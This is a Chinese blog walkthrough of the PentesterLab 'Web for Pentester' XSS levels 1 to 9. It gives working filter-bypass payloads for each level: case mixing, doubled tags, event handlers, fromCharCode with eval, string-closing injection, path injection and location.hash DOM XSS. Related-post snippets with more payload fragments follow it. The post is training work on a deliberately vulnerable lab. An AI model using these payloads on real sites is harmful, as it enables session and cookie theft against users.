Pentester Lab闯关记录1(XSS)

最新推荐文章于 2022-10-09 17:20:56 发布
最新推荐文章于 2022-10-09 17:20:56 发布
阅读量217 收藏
点赞数
分类专栏: 渗透测试基础 文章标签: javascript xss web html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43408042/article/details/109079963
版权

Pentester Lab闯关记录1(XSS)

xss example1

未执行任何过滤,直接使用以下payload:

<script>alert('xss')</script>

xss example2

过滤了<script>,使用大小写绕过构造,payload如下:

<sCript>alert('xss')</sCript>

xss example3

大写无法绕过,双写绕过,payload如下:

<scr<script>ipt>alert('xss')</s</script>cript>

xss example4

检测到script就报error,判断对提交内容进行了匹配,匹配到script就报error,因此使用界面元素进行注入,payload如下:

<textarea placeholder=键盘点击触发xss onkeypress=alert("xss")></textarea> 或者
<img src=-1 onerror=alert("xss")></img>

xss example5

检测到alert就报error,使用编码的方法替换alert(eval()用于计算字符串,并执行其中的javascript代码),payload如下:

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>

xss example6

查看网页HTML代码中有以下代码

<script>var $a= "hacker";</script>

因此可以使用闭合的方法进行注入。构造出以下payload:

<script>var $a= "";alert("xss");"";</script>    输入参数为:";alert("xss");"

xss example7

查看网页HTML代码中有以下代码:

<script>var $a= 'hacker';</script>

和上一题类似,知识换成了单引号,使用如下payload即可实现注入:

<script>var $a= '';alert(1);' ';</script>  输入参数为:';alert(1);'

xss example8

在这里插入图片描述
在url后添加\123发现其出现在了源代码的from中:

在这里插入图片描述
初步判断可以围绕以下代码构造payload:

<form action="/xss/example8.php/123" method="POST">  #在url末尾添加的、123出现在了from中
  Your name:<input type="text" name="name">
  <input type="submit" name="submit">

尝试构造以下payload实现注入:

<form action="/xss/example8.php/"><script>alert("xss")</script>< method="POST"> 
 payload为:/"><script>alert("xss")</script><

发现弹窗成功!

在这里插入图片描述
此时的网页源码如下:
在这里插入图片描述
可以发现代码已经被注入HTML源代码中。

xss example9

首先查看HTML源码:
在这里插入图片描述
发现如下代码:

<script>
  document.write(location.hash.substring(1));
</script>

这里是直接指将锚点内容布局在当前页面上,url中的#即锚点位置,所以理论上可以直接在#之后构造payload:

http://192.168.202.131/xss/example9.php#<script>alert("xss")</script>

但是测试没有成功(提交之后需要再次刷新)
在这里插入图片描述

最终在《web前端黑客技术揭秘》中找到了答案,不同浏览器的url编码存在差异,而这一题就涉及到这一不同浏览器的特性,这里没有成功弹窗就是因为chrome与firefox编码了<>这两个特殊符号,最终尝试在IE上测试,发现成功弹窗!
在这里插入图片描述
结束!

weixin_43408042
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pentesterlab-xss
qq_44881113的博客
11-02 2971
第一关 http://192.168.1.142/xss/example1.php?name=hacker 观察到url参数在页面显示,尝试xss http://192.168.1.142/xss/example1.php?name=hacker 成功 第二关 去掉了script 可以使用大小写绕过,也可以使用其他语句绕过 使用大小写绕过 192.168.1.142/xss/example2.php?name=hacker<Script>alert(1)</Script> 递归方法
pentesterlab xss(writeup)
一个安全研究员
04-03 1719
example1 第一题往往都是热身题,没有任何的过滤。通过查看源码发现我们输入的内容时直接输出在html标签之间的,所以直接插入: &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt; 注:这里我自己一直有一个误区,今天偶然看到一篇文章才发现,原来审查元素看到的并不是源代码,之前一直是这样查看源码的,有时候会有一些差异,因为源码是我们直接从服务器取过来的代码...
靶机12 PENTESTER LAB: XSS AND MYSQL FILE
honest_gg的博客
10-09 1786
本靶机练习说明如何使用跨站点脚本漏洞来访问管理员的 Cookie。然后,如何使用他/她的会话来访问管理以查找SQL注入并使用它获得代码执行。
PentesterLab » Web for Pentester 通关笔记
weixin_44377940的博客
02-08 996
寒假看到一个练习题,很有意思也很适合我这样的新手,于是下载下来练手。 下载地址
web for pentester XSS部分练习
若为此弦
08-21 3777
example 1 url上改成name=
web_for_pentester.pdf
04-02
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
web-for-pentester源码.rar
最新发布
07-13
web-for-pentester源码
freecodecamp-pentester-course
03-10
《freecodecamp-pentester-course》是针对网络安全与渗透测试的一个学习课程,主要聚焦于JavaScript技术的应用。在这个课程中,你将深入理解如何利用JavaScript进行安全评估和防护,为成为一名合格的渗透测试工程师...
Nmap-For-Pentester
05-22
跟着我们 Nmap防火墙扫描理解指南(第1部分) 了解Wireshark的Nmap扫描使用Nmap破解密码使用Nmap在服务器/客户端中查找漏洞使用NMAP进行网络扫描(入门指南) 使用Nmap的MSSQL渗透测试使用Nmap进行MySQL渗透测试
Experienced-Pentester-OSEP
03-20
经验丰富的OSEP只是存储我的一些课前研究笔记的地方。...PowerShell Shellcode运行器内存中的PowerShell代表类型反射代理感知的PowerShell通信 Windows脚本宿主执行客户端代码 JScript执行 JScript基本滴管 HTA,VBA,...
Pentester Lab闯关记录2(SQL Injections)
weixin_43408042的博客
10-14 477
Pentester Lab闯关记录2(SQL Injections)example1验证漏洞是否存在猜测查询返回的列数收集数据库基本信息爆破数据库 example1 验证漏洞是否存在 首先构造下面payload测试是否存在sql注入漏洞: http://192.168.202.131/sqli/example1.php?name=root’ and 1=1 --+ payload为:’ and 1=1 --+ 首先使用'闭合sql语句中的’,然后注入payload,使用--+注释掉后面的内容 发现正常返
xss-labs通关大合集
热门推荐
wo41ge的博客
07-26 3万+
xss-labs 文章所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 然后开始通关 level1 仔细观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么 就很明显,这一关主要就是考察反射型xss 但是由于不
当黑客就入门 XSS-Lab第八关
Tuye的博客
07-21 1166
** 第一步:判断是否存在漏洞 ** ** 第二部:尝试利用该漏洞 ** 查看你源码可以看到,做了多种编码。 尝试使用其他的编码的形式 对script中的一个字母进行html实体编码 HTML实体编码(HEX) javascri&#x70;t:alert() HTML实体编码(DEC) javascri&#112;t:alert() ...
PentesterLab靶场sql注入流程
m0_37570494的博客
01-28 3813
环境安装 随便在网上找了个Pentester的靶场,结果是2013年的,那就从2013年的这个靶场开始学习 下载镜像的地址: https://pentesterlab.com/exercises/web_for_pentester_II/iso 正常找个虚拟机,进行iso的安装 安装完成后,查下虚拟机的IP,直接访问即可http://192.168.29.129/ sql注入 Example 1 万能密码: 自己尝试了几个密码,筛选出了这几个通关的,亲试可用: admin'or 1=
pentesterlab xss漏洞分析
u013473575的专栏
01-15 1260
pentesterlab简介   pentesterlab官方定义自己是一个简单又十分有效学习渗透测试的演练平台。   pentesterlab环境搭建   官方提供了一个基于debian6的镜像,官网下载镜像,使用vmware建立一个虚拟机,启动即可。   ps:官方文档建议做一个host绑定,方便后面使用   windows下hosts文件目录:C:\Windows\System32
PentesterLab渗透演练平台
weixin_33695450的博客
04-02 975
转载自: https://www.blackh4t.org/archives/1143.html http://www.91ri.org/5958.html web for pentester是国外安全研究者开发的的一款web渗透测试平台(环境) 通过该平台你可以了解到常见的Web漏洞检测技术。 1、什么是WebAp...
搭建学习环境(十一)——Web_For_Pentester通关记录
baynk的博客
04-09 2506
0x00 Pentesterlab 又发现了一靶场,大多数都是相同的,但是也有之前一直没有学习的ldap注入,而且安装时用的不是开发者提供的整机靶场,自己把源码拿出来了,搭建在了自己的服务器上,然后还原的ldap环境及修改部分代码成功还原实验场景,对ldap也有了更深的理解,虽然花了不少时间,linux搞openladp感觉好麻烦,特别是导数据,不过还是很值得的,学了不少东西。 此靶场准备用两篇博...
PentesterXSS记录
qq_43936524的博客
02-11 341
文章目录Pentester常用url编码html实体编码常见的事件:常见的支持事件的标签第一关(无过滤):第二关(大小写绕过):第三关(双写绕过):第四关(构造标签绕过):第五关(eval+fromCharCode):第六关(闭合script双引号):第七关(闭合script单引号):第八关(特殊位置):第九关(location.hash): Pentester 常用url编码 符号 编码 %20 空格 %27 单引号 %3C < %3E > 测试特殊符号: &l
pentesterlab学习记录-week1
繁华褪尽始见真
03-30 868
Pentesterlab是一个引导你自学Web渗透测试技术的网站。它提供了一个为期15周的训练课程,以及不少供渗透测试的虚拟系统。 作为刚接触Web渗透的新人,我打算在博客里记录训练课程的学习过程(主要是操作部分),今天是第一周。 Week 1: Linux and scripting 在虚拟机里安装Linux系统 学习一门脚
Web For Pentester 第八关分析
06-07
第八关的网页源代码如下: ...<!... <title>Web for Pentester ...<h1 align="center">Welcome to Web for Pentester ... <img src="8.jpg" alt="web for pentester"> ...因此,第八关的 flag 是 "web_for_pentester"。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值